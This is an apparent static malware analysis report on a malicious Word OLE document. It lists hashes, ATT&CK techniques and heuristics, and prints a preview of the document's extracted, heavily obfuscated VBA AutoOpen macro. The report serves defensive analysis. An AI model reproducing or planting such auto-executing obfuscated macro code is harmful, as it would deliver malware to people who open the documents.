Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a060bf95e5f8a009…

MALICIOUS

Office (OLE)

Size: 129.4 KB
Created: 2018-09-26 15:00:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 90f325ed94ade7306194683e7332551c
SHA-1: 9de9e8db8580eb408f5ae169abce261b1dd813f9
SHA-256: a060bf95e5f8a009059ea545dd03c463a6a0af580444129c987a35caddf7e993
Risk score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a legacy WordBasic AutoOpen macro. The macro is heavily obfuscated, making it difficult to determine its exact function, but its presence and the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' heuristic strongly suggest malicious intent. The large slack space in the OLE structure is also a suspicious indicator. The primary IOC is the macro filename itself.

Heuristics (5)

  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 132,480 bytes but its declared streams total only 36,533 bytes; 95,947 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   23276 bytes
SHA-256: bb8f301360e61e2053665b29c683daba060c9c301995654b510fbddbfccef61d
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "isAZnTMVqjUrL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim DzncOb(2)
DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354)
DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15)
   Dim EAQdRb(1)
EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970)
   Dim zXbwjr(1)
zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882)
   Dim FvtMqm(1)
FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403)
   Dim mcrCmB(2)
mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950)
mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211)
jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW)
   Dim PFKBa(1)
PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911)
   Dim itUJUW(2)
itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711)
itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473)
   Dim PTXkN(2)
PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133)
PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404)
   Dim jjjYq(1)
jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838)
End Sub


Attribute VB_Name = "hUEwwFIJnmQWF"
Function fdkIw()
awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 "
bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27"
Dim KYCRhJ(1)
KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816)
   Dim moMZj(2)
moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720)
moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20)
jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7"

... (truncated)